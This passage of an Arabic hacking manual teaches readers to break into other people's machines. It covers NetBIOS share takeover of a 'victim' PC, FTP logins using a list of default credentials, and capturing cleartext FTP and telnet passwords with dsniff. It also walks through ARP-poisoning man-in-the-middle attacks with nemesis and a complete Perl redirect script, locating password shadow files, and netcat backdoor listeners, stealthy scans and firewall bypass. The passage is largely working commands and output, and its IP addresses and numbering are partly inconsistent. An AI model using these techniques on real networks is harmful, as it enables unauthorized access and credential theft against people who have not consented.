    Net use i \\host\ super-crystal/user:A administrator
    رقم الاي بي طبعا =Host
    nbstat ويوجد طريقة اخرى بقيادة
    قم بطباعة هذه الامر
    Nbstat –A ١٢٧,٠,٠,١
    هذا فقط في حالة واحدة اذا كان البورت ١٣٧ و ١٣٩ مفتوح بالجهاز
    ☺ المستهدف فسترى معلومات هائله بعد مايتم طبع الامر
    اذا نجح معك الطريقة وكان البورت مفتوح فأعلم انك سيطرت على الجهاز
    سيطرة كاملة وافضل لك من الاختراق ببرامج التجسس اانيه ب ١٠٠
    مره
    وتأكد انك تشترك بجميع ملفات جهاز الضحيه !!!
    ولكن الملفات مخفيه؟؟؟؟؟؟
    في هذه الحالة طبق اوامر كريستال الاحترافيه
    Net use e \\host\c$password/user:username
    ٤٦
    جميعنا يعرف مدى اهمية دوس في نظام ويندوز
    ولكن اختلف الامر في نظام ويندوز اكس بي وظهر دوس بشكل افضل
    و ٩٨ و ٩٥ Me في الانظمة السابقة من ويندوز ٢٠٠٠ و
    command الدوس هو
    افضل بكثير منه في الانظمة السابقه cmd.exe اما في ويندوز اكس بي
    بما يتميز من سهولته واختصاراته واتاحته لااوامر عدة
    إليكم الشرح التفصيلي لدوس اكثر
    الدوس في نظام ويندوز اكس بي
    ٤٧
    **دوس بوابة ويندوزك الاولى لعالم الإنترنت**
    يجب ان تتعلم جميع اوامر دوس وبروتوكولاا كي تستطيع تطبيقها في اوقاا
    بشكل افضل
    سنتكلم عن الدوس بشكل مبسط ومسهل للجميع
    ونبتعد عن كثره الفلسفة
    NETBIOS TCP/IP
    NBTSTAT TELNET
    NET VIEW FTP
    NET USE PING
    NET LOCALGROUP NETSTAT
    TRACERT
    NSLOOKUP
    تقريبا الجدول سهل الكثير على القارئ
    والان سنتكلم عن
    نظام السيطرة على الارسال
    TCP/IP
    وهذا هو بروتكول حزم UDP هذا غالبا مايكون مرتبط ببروتوكول ال
    البيانات
    ٤٨
    فانت بأمكانك ان تحول هذه الاوامر ضد حاسباا الاخرى
    تستخدم اكثر الشبكات المحلية نظام السيطره على الارسال TCP\IP
    NET BIOS
    Net Basic Input/Output System هي اختصار ال
    طريق اخر للاتصال بالحاسبات الاخرى هذه في اغلب الاحيان يستخدم في
    نظام ويندوز و ليونكس ويونيكس
    انت مممكن ان تستخدم اوامر النت بيوس في الانترنت بربط مع نظام
    السيطره على الارسال
    ولكن في اغلب الاحيان تكون اوامر النت بيوس مغلقه ببرامج حماية
    وأيضَا ليس العديد من الحاسبات تستخدم النت بيوس
    ولكن هذا لايمنعنى من شرح الاختراق عن طريق النت بيوس
    ٤٩
    اذن ماهو رأيك لو قمت بفتح موجة الاوامر دوس وكتابة هذا الامر مع
    اختيار الموقع الذي تريد ان تستخرج عنه معلومات او حتى البريد الذي تريد
    عنه معلومات
    أليكم الشرح
    في ليونكس whois وطبعا هذا يعادل اداة ال
    C:\>nslookup
    Default Server: DNS.saudi.net
    Address: ٢١٢٫١٦٦٫٢٦
    بعد ماتعرفنا على نوع خادمهم
    سنبدأ بطباعة الامر
    >Set q=xm
    >crystal.com
    Server: DNS.saudi.net
    Address: ٢١٢٫١٦٦٫٢٦
    crystal.com MX preference = ٥, mail exchanger =
    mail.crystal.com
    crystal.com MX preference = ١٠, mail exchanger =
    mx٢.crystal.com
    crystal.com MX preference = ٢٠, mail exchanger =
    mx٣.crystal.com
    crystal.com nameserver = ns.crystal.com
    crystal.com nameserver = ns-١.crystal.com
    crystal.com nameserver = ns-٢.crystal.com
    crystal.com nameserver = ns-٣. crystal.com
    crystal.com nameserver = ns-٤. crystal.com
    mail. crystal.com internet address = ٢١٢٫١٦٦٫٢٦
    mx٢. crystal.com internet address = ٢١٢٫١٦٦٫٢٦
    mx٣. crystal internet address = ٢١٢٫١٦٦٫٢٦
    ٥٠
    ns. crystal.com internet address = ٢١٢٫١٦٦٫٢٦
    ns. crystal.com internet address = ٢١٢٫١٦٦٫٢٦
    ns. crystal.com internet address = ٢١٢٫١٢٤٫٠٫٢٥٤
    ns. crystal.com internet address = ٢١٢٫١٢٤٫١٫٢٥٤
    ns. crystal.com internet address = ٢١٩٫٩٨٫٣٢٫٥٤
    ns. crystal.com internet address = ٢١٦٫١٢٤٫٠٫٣٢
    ns. crystal.com internet address = ٢١٦٫١٢٤٫٠٫٣٠
    ns. crystal.com internet address = ٢١٦٫١٢٤٫٠٫٢٥
    ns. crystal.com internet address = ٢١٦٫١٢٤٫٠٫١٥
    ns. crystal.com internet address = ٢١٦٫١٢٤٫٠٫٢١
    ns. crystal.com internet address = ٢١٦٫١٢٤٫٠٫٩
    ns-١. crystal.com internet address = ٢١٦٫١٢٤٫٢٦٫٢٥٤
    ns-٢. crystal.com internet address = ٢١٩٫٩٨٫٣٢٫٥٤
    ns-٣. crystal.com internet address = ٢١٦٫١٢٤٫١٫٢٥٤
    ns-٤. crystal.com internet address = ٢١٦٫١٢٤٫٠٫٢٥٤
    >
    السطور التى اخبرتك ماهي الحسابات ستتيح لك القيام بتزوير بريد الكتروني
    مثلا crystal الى الناس مع الموقع المستهدف وليكون
    واحيانا عندما تسئل عن خادم بريد
    ستعطيك اداة البحث هذا النوع من رسالة الخطأ
    DNS request timed out.
    timeout was ٢ seconds.
    DNS request timed out.
    timeout was ٢ seconds.
    عدها تمكثل المشكة في الهويز
    ٥١
    والان علمت مدى خطورة الانترنت وانه ليس امانًا بشكل صحيح
    وبأمكان اي شخص التجسس على بريدك الالكتروني وبسهولة بأمكانه
    حذف مايريد من بريدك بأستخداام التلينت
    ورأيت انت ماذا استخرج لك من معلومات وبأمكانك تطبيقها
    على بريدك الالكتروني مع وضع الخادم المستضيف لبريدك
    لتأكد من صحة كلامي
    وسأبتعد في كتابي هذا عن الاوامر الخطيره ذا الموضوع وسأتركها بالجزء
    الثاني من كتاب القرصنة تحت اهر
    وتقريبا انتهينا من اهم النقاط ذا الجزء ولكن لن نبتعد عن دوس في
    مواضيعنا التاليه
    ٥٢
    الفصل الثالث
    ٣
    ٥٣
    وهنا سنشرح الطرق الذكيه FTP سبق وتكلمنا عن بروتوكول ال
    لإستغلال هذا البروتوكول في التسلل الى الانظمة والدخول
    أعتبر هذا الجزء من الاجزاء المحضوره في كتابي ولكن لزيادة معلومات القارئ
    العزيز أحببت ان اتوسع ذا الجزء في الدخول الى الانظمة .
    كما تعلمنا كيفية الدخول إلى الخدمة عن طريق التلينت او حتى الشيل او
    الدوس ولكن افضل التلينت على بقية البرامج الاخرى .
    اذهب لشاشة التلينت
    المراد الدخول إلية ولتكون شبكتك الخاصه ip قم بوضع رقم ال
    Host name : ١٢٧,٠,٠,١
    Port : ٢١
    رياضيات الاف تي بي
    % - ÷ × +
    ٥٤
    ضع رقم الاي بي المراد الدخول إليه والبورت يكون بورت الخدمه وهو
    ال ٢١
    بعد مايتم التحقق من إتصالك
    ستظهر لك شاشة تطلب كلمة المرور واسم المستخدم الخاص بالشبكة او
    الموقع.... الخ
    قم بوضع اسم المستخدم وكلمة المرور اذا كانت شبكتك او ضع احد
    الاسماء التى ستظهر لك بالجدول
    ٥٥
    كلمة المرور اسم المستخدم
    root root
    nobody anon
    informix database
    fld / test /
    support
    field
    qadmin adm / admin
    daemon daemon
    admin admin
    install install
    anon anon
    ncrm ncr
    net netowrk
    netman net / man / mgr
    nuucp anon
    anon [email protected]
    games games
    guest guest
    daemon daemon
    sysmaint /
    service
    main
    manager mgr / man
    lib library / syslib
    ٥٦
    ingres database
    تقريبا هذه كلمات المرور واسماء المستخدمين المتعارف عليها في خدمة الاف
    تي بي .
    بعد ماقمت بالدخول للسيرفر او الشبكة
    اذا ظهرت هذه الرسالة لديك بشاشة التلينت
    Logged in super-crystaL
    الاسم الذي ادخلته =Super-CrystaL
    ☺ فتأكد انك اتصلت بالشبكة او الخادم
    والان قم بتنفيذ هذا الامر بعد إتصالك بالخادم
    Pasv
    سيرد عليك الخادم ذا المعلومات
    Entring Passive Mode ١٢٧،٠،٠،١،١٤،٤٨
    ١٢٧,٠,٠,١ = عنوان رقم الاي بي للخادم
    ip ومعروف انه عنوان بروتوكول انترنت
    ولكن ماهو الذي باللون الازرق؟
    ١٤,٤٨ = هذا هو منفذ الخادم او الشبكة المفتوح
    ولكن جميعنا يعرف ان المنفذ غالبا مايستخدم رقم واحد وليس رقمين في
    خانتين اذن ؟
    الخادم الذي نريد المحاولة لدخولة قسم لنا المنفذ بمسألة حسابية سداسي
    ٥٧
    عشري
    اذن هذا لن يفيدنا في التحقق من المنفذ المفتوح بالخادم !!
    يوجد طريقة واحدة يستخدمها فقط المخترق العبقري في تحليل المنفذ المفتوح
    وهي
    ٢٥٥ × ان تقوم بضرب العدد الاول في الخانة الاولى ١٤
    لماذا ضربنا العدد في ٢٥٥
    لإن هذا العدد هو آخر عدد يصله رقم الاي بي وبعد ذالك يبدأ من الصفر
    وتبدأ سلسلة جديدة من ارقام الإي بي كما تعلمنا في جزء بروتكول الإنترنت
    ٢٥٥ سيخرج لنا الناتج هو ٣٧١٠ × بعد ماقمنا بضرب العدد ١٤
    ٣٧٥٨= ٣٧١٠+ الان قم بعملية جمع للعدد ٤٨
    ٣٧٥٨ هذا هو رقم المنفذ المفتوح بالخادم
    اذن ماذا تنتظر ........قم بمعاودة الاتصال بالاف تي بي ولكن ضع البورت
    ٣٧٥٨ المفتوح بالخادم واطلب الاتصال وسترى ،،،،
    ٥٨
    كثر الحديث حول اداة السنايفر في مواقعنا العربية ولكن للاسف
    لم يكن الشرح تطبيقي على الخوادم وهذا على ماأعتقد قلة خبرم في اداة
    سنايفر التي تعمل على سطر اوامر واغلبهم شرحها على الواجهة الرسومية
    بنظام لينوكس..
    ولكن هذا لايفيدك اذا اردت استغلالها بالاختراق ويجب ان تكون لديك
    خبره بادوات السنايفر التى تعمل على سطر اوامر في الشيل وهذا ماسنفعله
    حاليا ..
    يوجد الكثير من الادوات التى تعمل على سطر اوامر ولكن افضل لك أن
    TcpDump تستخدم اداة ال
    وقم بتحميلها من موقعها الرئيسي
    /http://www.tcpdump.org
    sNiffing
    ٥٩
    اولا قم بسحب الاداة من موقعها عبر الشيل ذا الامر
    wget http://www.tcpdump.org/release/tcpdump-٣٫٧٫٢.tar.gz
    واذا اردت تثبيت الاداة كل ماعليك فعله هو
    كتابة هذا الاوامر بالشيل
    ./configure
    +
    Make
    +
    make install
    ☺ والآن نقوم بتطبيق الاوامر عبر الشيل على السيرفر لتحليل لإظهار النتائج
    واهم شئ فعله قبل ان تبدا بالتوسع بالموضوع هو ان تعلم انه يجب ان تكون
    روت على السيرفر حتى تستطيع تطبيق الاوامر
    ***** انطلقت لحظة الصفر ****
    سنبدأ بكتابة الامر
    Ifconfig
    هذا الامر هو نفسه امر
    Ipconfig
    بنظام ويندوز
    والاختلاف بسيط في كتابتة في كلا النظامين وهو حرف
    P
    ٦٠
    بعد ماقمنا بكتابة الامر بشاشة الشيل استخرج لنا المعلومات كالموضح
    بالصورة رقم ( ١) .... قم بكتابة الاوامر مثل ماهي موضح لك ببقية الصورة
    # ifconfig eth0
    eth0 Link encap:Ethernet HWaddr 00:00:AD:D1:C7:ED
    BROADCAST MULTICAST MTU:1500 Metric:1
    RX packets:0 errors:0 dropped:0 overruns:0
    frame:0
    TX packets:0 errors:0 dropped:0 overruns:0
    carrier:0
    collisions:0 txqueuelen:100
    RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)
    Interrupt:9 Base address:0xc000
    collisions:0 txqueuelen:100
    RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)
    Interrupt:9 Base address:0xc000
    ( الصورة رقم ( ٢
    # ifconfig eth0
    ٦١
    eth0 Link encap:Ethernet HWaddr 00:00:AD:D1:C7:ED
    # ifconfig eth0
    eth0 Link encap:Ethernet HWaddr 00:00:AD:D1:C7:ED
    BROADCAST PROMISC MULTICAST MTU:1500 Metric:1
    RX packets:0 errors:0 dropped:0 overruns:0
    frame:0
    TX packets:0 errors:0 dropped:0 overruns:0
    carrier:0
    collisions:0 txqueuelen:100
    RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)
    Interrupt:9 Base address:0xc000
    #
    والان سنقوم بتوجية امر
    tcpdump -l -X 'ip host 69.165.0.166
    69.165.0.166 =قم بتغييره للعنوان المراد فحصه
    # tcpdump -l -X 'ip host 69.165.0.166'
    ٦٢
    tcpdump: listening on eth0
    21:27:44.684964 69.165.0.166.ftp > 69.165.0.193.32778:
    P 1:42(41) ack 1 win 17316
    <nop,nop,timestamp 466808 920202> (DF)
    0x0000 4500 005d e065 4000 8006 97ad c0a8 0076
    E..][email protected]
    0x0010 c0a8 00c1 0015 800a 292e 8a73 5ed4 9ce8
    ........)..s^...
    0x0020 8018 43a4 a12f 0000 0101 080a 0007 1f78
    ..C../.........x
    0x0030 000e 0a8a 3232 3020 5459 5053 6f66 7420
    ....220.TYPSoft.
    0x0040 4654 5020 5365 7276 6572 2030 2e39 392e
    FTP.Server.0.99.
    0x0050 3133
    13
    21:27:44.685132 69.165.0.193.32778 > 69.165.166.ftp: .
    ack 42 win 5840
    <nop,nop,timestamp 920662 466808> (DF) [tos 0x10]
    0x0000 4510 0034 966f 4000 4006 21bd c0a8 00c1
    [email protected]@.!.....
    0x0010 c0a8 0076 800a 0015 5ed4 9ce8 292e 8a9c
    ...v....^...)...
    0x0020 8010 16d0 81db 0000 0101 080a 000e 0c56
    ...............V
    0x0030 0007 1f78
    ...x
    21:27:52.406177 69.165.0.193.32778 > 69.165.0.166.ftp:
    P 1:13(12) ack 42 win 5840
    <nop,nop,timestamp 921434 466808> (DF) [tos 0x10]
    0x0000 4510 0040 9670 4000 4006 21b0 c0a8 00c1
    [email protected]@[email protected]!.....
    0x0010 c0a8 0076 800a 0015 5ed4 9ce8 292e 8a9c
    ...v....^...)...
    0x0020 8018 16d0 edd9 0000 0101 080a 000e 0f5a
    ...............Z
    0x0030 0007 1f78 5553 4552 206c 6565 6368 0d0a
    ...xUSER.super..
    21:27:52.415487 69.165.0.166.ftp > 192.168.0.193.32778:
    P 42:76(34) ack 13 win
    17304 <nop,nop,timestamp 466885 921434> (DF)
    0x0000 4500 0056 e0ac 4000 8006 976d c0a8 0076
    [email protected]
    0x0010 c0a8 00c1 0015 800a 292e 8a9c 5ed4 9cf4
    ٦٣
    ........)...^...
    0x0020 8018 4398 4e2c 0000 0101 080a 0007 1fc5
    ..C.N,..........
    0x0030 000e 0f5a 3333 3120 5061 7373 776f 7264
    ...Z331.Password
    0x0040 2072 6571 7569 7265 6420 666f 7220 6c65
    .required.for.le
    0x0050 6563
    ec
    21:27:52.415832 192.168.0.193.32778 >
    192.168.0.118.ftp: . ack 76 win 5840
    <nop,nop,timestamp 921435 466885> (DF) [tos 0x10]
    0x0000 4510 0034 9671 4000 4006 21bb c0a8 00c1
    [email protected]@.!.....
    0x0010 c0a8 0076 800a 0015 5ed4 9cf4 292e 8abe
    ...v....^...)...
    0x0020 8010 16d0 7e5b 0000 0101 080a 000e 0f5b
    ....~[.........[
    0x0030 0007 1fc5
    ....
    21:27:56.155458 192.168.0.193.32778 >
    192.168.0.118.ftp: P 13:27(14) ack 76 win
    5840 <nop,nop,timestamp 921809 466885> (DF) [tos 0x10]
    0x0000 4510 0042 9672 4000 4006 21ac c0a8 00c1
    [email protected]@.!.....
    0x0010 c0a8 0076 800a 0015 5ed4 9cf4 292e 8abe
    ...v....^...)...
    0x0020 8018 16d0 90b5 0000 0101 080a 000e 10d1
    ................
    0x0030 0007 1fc5 5041 5353 206c 3840 6e69 7465
    [email protected]
    0x0040 0d0a ..
    21:27:56.179427 69.165.0.166.ftp > 192.168.0.193.32778:
    P 76:103(27) ack 27 win
    17290 <nop,nop,timestamp 466923 921809> (DF)
    0x0000 4500 004f e0cc 4000 8006 9754 c0a8 0076
    [email protected]
    0x0010 c0a8 00c1 0015 800a 292e 8abe 5ed4 9d02
    ........)...^...
    0x0020 8018 438a 4c8c 0000 0101 080a 0007 1feb
    ..C.L...........
    0x0030 000e 10d1 3233 3020 5573 6572 206c 6565
    ....230.User.lee
    0x0040 6368 206c 6f67 6765 6420 696e 2e0d 0a
    ٦٤
    لن تفهم بعض هذه المعلومات ويجب ان تستخدم محلل للبروتوكولات حتى
    ASCII يقوم بتحويلها الى صيغة
    ولكن حتى لايكون شرحها به شئ من الغموض سأشرح لك .
    استخرج لنا الامر السابق جميع المعلومات حول خدمه الاف تي بي والتلينت
    للسيرفر الذي وضعنا عنوانه Pop وال ٣
    لاتتلخبط اسلاك عقلك وتقول لي المعلومات ستكون مشفره
    فجميع اتصالات الاف تي بي لاتكون ابدا مشفره وستمتع ناظرك بما ترى
    بدون المراجعة لبرامج كراك
    وحتى اثبت لك صحة الكلام نفذ الامر التالي لاستخراج كلمة المرور واسم
    المستخدم الصحيحة
    # dsniff -n
    dsniff: listening on eth0
    -----------------
    12/10/02 21:43:21 tcp 69.165.0.193.32782 -> 192.168.0.118.21
    USER super
    PASS [email protected]
    -----------------
    12/10/02 21:47:49 tcp 69.165.0.193.32785 -> 192.168.0.120.23
    (telnet)
    USER root
    PASS rOxRay
    استخرجنا يوزوباسوورد الاف تي بي والتلينت ايضا
    ٦٥
    ولو كنت مدقق لكان اتضح لك انه عرض اليوزنيم والباسوورد قبل كتابتنا
    ☺ للامر وهي بالصورة السابقه
    ------------------
    وهذا بعد ماقمنا بعمليه هجوم على الشبكة بالامر
    dsniff
    .
    انتهينا من الخطوة الاولى وسنتوجه للخطوه الثانيه
    قم باارسال بينج عبر هذا الامر وانظر
    ٦٦
    # ping -c 1 -w 1 69.165.0.1
    PING 69.165.0.1 (69.165.0.1): 56 octets data
    64 octets from 69.165.0.1: icmp_seq=0 ttl=64 time=0.4 ms
    --- 69.165.0.1 ping statistics ---
    1 packets transmitted, 1 packets received, 0% packet loss
    round-trip min/avg/max = 0.4/0.4/0.4 ms
    # ping -c 1 -w 1 69.165.0.166
    PING 69.165.0.166 (69.165.0.166): 56 octets data
    64 octets from 69.165.0.166: icmp_seq=0 ttl=128 time=0.4 ms
    --- 69.165.0.166 ping statistics ---
    1 packets transmitted, 1 packets received, 0% packet loss
    round-trip min/avg/max = 0.4/0.4/0.4 ms
    # arp -na
    ? (69.165.0.166) at 00:50:18:00:0F:01 [ether] on eth0
    ? (69.165.0.166) at 00:C0:F0:79:3D:30 [ether] on eth0
    # ifconfig eth0
    eth0 Link encap:Ethernet HWaddr 00:00:AD:D1:C7:ED
    inet addr:192.168.0.193 Bcast:69.165.0.255
    Mask:255.255.255.0
    UP BROADCAST NOTRAILERS RUNNING MTU:1500 Metric:1
    RX packets:4153 errors:0 dropped:0 overruns:0 frame:0
    TX packets:3875 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:100
    RX bytes:601686 (587.5 Kb) TX bytes:288567 (281.8 Kb)
    Interrupt:9 Base address:0xc000
    #
    جميل جدا استخرجنا معلومات كاملة حول الماك الرئيسي وهذا
    ماظهر لنا بالصورة
    والان قم بتنفيذ هذا الامر
    ٦٧
    # nemesis
    NEMESIS -=- The NEMESIS Project Version 1.4beta3 (Build
    22)
    NEMESIS Usage:
    nemesis [mode] [options]
    NEMESIS modes:
    arp
    dns
    ethernet
    icmp
    igmp
    ip
    ospf (currently non-functional)
    rip
    tcp
    udp
    NEMESIS options:
    To display options, specify a mode with the option
    "help".
    # nemesis arp help
    ARP/RARP Packet Injection -=- The NEMESIS Project
    Version 1.4beta3 (Build 22)
    ARP/RARP Usage:
    arp [-v (verbose)] [options]
    ARP/RARP Options:
    -S <Source IP address>
    -D <Destination IP address>
    -h <Sender MAC address within ARP frame>
    -m <Target MAC address within ARP frame>
    -s <Solaris style ARP requests with target hardware
    addess set to broadcast>
    -r ({ARP,RARP} REPLY enable)
    -R (RARP enable)
    -P <Payload file>
    Data Link Options:
    ٦٨
    -d <Ethernet device name>
    -H <Source MAC address>
    -M <Destination MAC address>
    You must define a Source and Destination IP address.
    #
    # nemesis arp -v -r -d eth0 -S 69.165.0.1-D
    69.165.0.166 -h 00:00:AD:D1:C7:ED -m
    00:C0:F0:79:3D:30 -H 00:00:AD:D1:C7:ED -M
    00:C0:F0:79:3D:30
    ARP/RARP Packet Injection -=- The NEMESIS Project
    Version 1.4beta3 (Build 22)
    [MAC] 00:00:AD:D1:C7:ED >
    00:C0:F0:79:3D:30
    [Ethernet type] ARP (0x0806)
    [Protocol addr:IP] 69.165.0.1> 69.165.0.166
    [Hardware addr:MAC] 00:00:AD:D1:C7:ED >
    00:C0:F0:79:3D:30
    [ARP opcode] Reply
    [ARP hardware fmt] Ethernet (1)
    [ARP proto format] IP (0x0800)
    [ARP protocol len] 6
    [ARP hardware len] 4
    Wrote 42 byte unicast ARP request packet through
    linktype DLT_EN10MB.
    ARP Packet Injected
    # nemesis arp -v -r -d eth0 -S 69.165.0.166 -D
    69.165.0.1-h 00:00:AD:D1:C7:ED -m
    00:50:18:00:0F:01 -H 00:00:AD:D1:C7:ED -M
    00:50:18:00:0F:01
    ARP/RARP Packet Injection -=- The NEMESIS Project
    Version 1.4beta3 (Build 22)
    [MAC] 00:00:AD:D1:C7:ED >
    00:50:18:00:0F:01
    [Ethernet type] ARP (0x0806)
    [Protocol addr:IP] 69.165.0.166> 69.165.0.1
    ٦٩
    [Hardware addr:MAC] 00:00:AD:D1:C7:ED >
    00:50:18:00:0F:01
    [ARP opcode] Reply
    [ARP hardware fmt] Ethernet (1)
    [ARP proto format] IP (0x0800)
    [ARP protocol len] 6
    [ARP hardware len] 4
    Wrote 42 byte unicast ARP request packet through
    linktype DLT_EN10MB.
    ARP Packet Injected
    #
    their MAC address is at the attacker's
    loooooooooooooooool
    # perl -e 'while(1){print "Redirecting...\n";
    system("nemesis arp -v -r -d eth0 -S
    192.168.0.1 -D 192.168.0.118 -h 00:00:AD:D1:C7:ED -m
    00:C0:F0:79:3D:30 -H
    00:00:AD:D1:C7:ED -M 00:C0:F0:79:3D:30");
    system("nemesis arp -v -r -d eth0 -S
    192.168.0.118 -D 192.168.0.1 -h 00:00:AD:D1:C7:ED -m
    00:50:18:00:0F:01 -H
    00:00:AD:D1:C7:ED -M 00:50:18:00:0F:01");sleep 10;}'
    Redirecting...
    Redirecting...
    ☺ هكذا تستغل اختراقك ياغلام
    والان النقطه التاليه لكي تنجح
    ٧٠
    #!/usr/bin/perl
    $device = "eth0";
    $SIG{INT} = \&cleanup; # Trap for Ctrl-C, and send to
    cleanup
    $flag = 1;
    $gw = shift; # First command line arg
    $targ = shift; # Second command line arg
    if (($gw . "." . $targ) !~ /^([0-9]{1,3}\.){7}[0-
    9]{1,3}$/)
    { # Perform input validation; if bad, exit.
    die("Usage: arpredirect.pl <gateway> <target>\n");
    }
    # Quickly ping each target to put the MAC addresses in
    cache
    print "Pinging $gw and $targ to retrieve MAC
    addresses...\n";
    system("ping -q -c 1 -w 1 $gw > /dev/null");
    system("ping -q -c 1 -w 1 $targ > /dev/null");
    # Pull those addresses from the arp cache
    print "Retrieving MAC addresses from arp cache...\n";
    $gw_mac = qx[/sbin/arp -na $gw];
    $gw_mac = substr($gw_mac, index($gw_mac, ":")-2, 17);
    $targ_mac = qx[/sbin/arp -na $targ];
    $targ_mac = substr($targ_mac, index($targ_mac, ":")-2,
    17);
    # If they're not both there, exit.
    if($gw_mac !~ /^([A-F0-9]{2}\{5}[A-F0-9]{2}$/)
    {
    die("MAC address of $gw not found.\n");
    }
    if($targ_mac !~ /^([A-F0-9]{2}\{5}[A-F0-9]{2}$/)
    {
    die("MAC address of $targ not found.\n");
    }
    # Get your IP and MAC
    print "Retrieving your IP and MAC info from
    ifconfig...\n";
    ٧١
    @ifconf = split(" ", qx[/sbin/ifconfig $device]);
    $me = substr(@ifconf[6], 5);
    $me_mac = @ifconf[4];
    print "[*] Gateway: $gw is at $gw_mac\n";
    print "[*] Target: $targ is at $targ_mac\n";
    print "[*] You: $me is at $me_mac\n";
    while($flag)
    { # Continue poisoning until ctrl-C
    print "Redirecting: $gw -> $me_mac <- $targ";
    system("nemesis arp -r -d $device -S $gw -D $targ -h
    $me_mac -m $targ_mac -H
    $me_mac -M $targ_mac");
    system("nemesis arp -r -d $device -S $targ -D $gw -h
    $me_mac -m $gw_mac -H
    $me_mac -M $gw_mac");
    sleep 10;
    }
    sub cleanup
    { # Put things back to normal
    $flag = 0;
    print "Ctrl-C caught, exiting cleanly.\nPutting arp caches
    back to normal.";
    system("nemesis arp -r -d $device -S $gw -D $targ -h
    $gw_mac -m $targ_mac -H
    $gw_mac -M $targ_mac");
    system("nemesis arp -r -d $device -S $targ -D $gw -h
    $targ_mac -m $gw_mac -H
    $targ_mac -M $gw_mac");
    }
    # ./arpredirect.pl
    Usage: arpredirect.pl <gateway> <target>
    # ./arpredirect.pl 69.165.0.1 69.165.0.166
    Pinging 69.165.0.1 and 69.165.0.166 to retrieve MAC
    addresses...
    Retrieving MAC addresses from arp cache...
    Retrieving your IP and MAC info from ifconfig...[*] Gateway: 69.165.0.1 is at 00:50:18:00:0F:01[*] Target: 69.165.0.166 is at 00:C0:F0:79:3D:30[*] You: 69.165.0.193 is at 00:00:AD:D1:C7:ED
    Redirecting: 192.165.0.1 -> 00:00:AD:D1:C7:ED <-
    69.165.0.166
    ARP Packet Injected
    ٧٢
    ARP Packet Injected
    Redirecting: 69.165.0.1-> 00:00:AD:D1:C7:ED <-
    69.165.0.166
    ARP Packet Injected
    ARP Packet Injected
    Ctrl-C caught, exiting cleanly.
    Putting arp caches back to normal.
    ARP Packet Injected
    ARP Packet Injected
    #
    وتقريبا انتهينا من الشرح الموجز لااداة السنايفر
    ٧٣
    اغلب المخترقين يصعب عليه استخراج ملف كلمات المرور الاصلي والذي
    بالانظمة x يحصل به على كلمات المرور مشفره وليست مظلله بعلامة
    فالكل نظام مسار به كلمات مرور وحسابات المستخدمين الموجودين
    بالخادم وهنا سأشرح جميع الانظمة ومسارات حسابات المستخدمين بالجدول
    ادناه
    مسارات ملفات المستخدمين بالانظمة
    ٧٤
    ملف كلمات المرور النظام
    Linux etc/shadow/
    Digital UNIX etc/tcb/aa/user/
    AIX etc/security/passwd/
    ConvexOS ١٠ etc/shadpw
    ConvexOS ١١ etc/shadow/
    BSD ٤,٣ etc/master.passwd/
    HP-UX secure/etc/passwd./
    IRIX ٥ etc/shadow/
    UNICOS etc/udb/
    SunOS etc/shadow/
    System V r٤,٠ etc/shadow/
    قم بكتابة الامر بموجة الشيل وستجد جميع حسابات المستخدمين بكلمات
    مرورهم مشفره
    اما طريقة فك تشفيرها لن اشرحها بكتابي فهي تعتمد على برامج كراك
    مثل جون ذا ريبر وجاك ذا ريبر .
    الهدف من وضع الجزء هذا فقط لزيادة معلومات ولن اشرح أي نقطه
    اعتبرها للتخريب ...........
    ٧٥
    هذا الجزء قد شاركني به اخى صانع السلالم النائب العام لفريقي السابق
    وهذا ليس لقلة خبرتى بمجال الادوات ولكن بما انه قام بكتابة هذا الدروس
    للفريق سابقا ولم تنتشر أحببت ان اضعها هنا
    الادوات الإحترافية
    ٧٦
    الكاتب: صانع السلالم
    اوامر النت كات
    netcat سوف يتم استخدام افضل الاوامر لي الاداة
    # كيفية عمل مسح على موقع
    nc –v –z ١٩٢,١٦٨,١,٩٠ ١- يتم بواسطة ٢٠٠
    اما في حال وجود نظام كشف الدخلاء
    سوف اقوم بجعل عملية المسح اكثر سريه حيث ستكون عملية المسح اكثر
    عشوائيه مما يساعد في اخفاء العمليه ولا يجعها تبدو كعملية مسح
    الامر
    nc -v -z -r -i ٤٢ target ٢٠-٨٠
    امر التعرف على الخدمات يعني عملية رفع البصمات للبرامج
    nc -v target الامر ٢١ ٢٢ ٨٠
    فا احد upd يقبل رزم syslog *في حال انا اذا اردنا معرفت ان
    الطرق لي الكشف عن هذا الشي
    هو الامر
    #echo "<٠> rait any maissg "l ./nc -u target
    (port)
    * طريقة الالتفاف حول الجدران الناريه حيث بعض الجدران الناريه تسمح
    في المرور والخروج فيمكننا الاستفاده منه حيث الامر dns بمرور رزم
    ٧٧
    تستطيع ان تتخطى المرشح الذي nc -p ٥٣ targthost ٩٨٩٨
    aol instant messenger يصد عاده مرور
    كيفية جعل النت كات تعمل كا باك دور
    طبعا يجب علينا رفع النت كات للسيفر واما بالنسبه
    لكيفية جعلها تعمل كاباك دور
    ننفذ هذا الامر
    nc -L -p ١٠٠٠١
    اما من ناحية الاتصال في هذا البورت والتحكم فيه
    نكتب هذا الامر
    nc –v –n ip the host بالامر ١٠٠٠١
    طبعا الرقم اقصد العدد ١٠٠٠١ هو رقم المنفذ إلي راح ندخل او البوابه
    لنا يحق لنا تغييرها لي أي شي
    *في حال نريد النت كات ان نجعلها كا الافتبي
    اول شي امر استقبال او سحب ملف من السيرفر , مثلا اذا كان فالسيرفر
    : nc –l – ونبغي نسحبه , بنطبق هذا الامر hack.txt , ملف اسمه
    p ١٢٣٤ >hack.txt
    ١٢٣٤ هذا هو البورت الي بنستخدمه في سحب الملف.
    انزين , واذا حبينا انا نرفع ملف للسيرفر , كيف ؟؟
    عن طريق هذا الامر
    ٧٨
    : nc ١٩٢,١٦٨,١,٩٠ ١٢٣٤ <hack.txt , ^C
    * طبعا في حال رفعنا ملف للسيرفر ونبي نشغله
    نكتب الامر وعلشان نشغل الملف في السيرفر , نستخدم الامر , !
    hack.txt!
    ٧٩
    Nmap شرح اداة ال
    الكاتب: صانع السلالم
    بسم الله الرحمن الرحيم
    الحمدالله والصلاة والسلام على اشرف الانبياء والمرسلين
    اقدم لكم اخواني بمناسبة صدور كتاب القراصنة تحت اهر هديه متواضعه
    مني للاخ كرستال
    Nmap
    تعتبر من اقوى الماسحات انتشارا وذالك لانه يسهل تحميلها Nmap الاداه
    وتثبيتها بسرعه وكما لقوا في اكتشاف المنافذ المفتوحه .
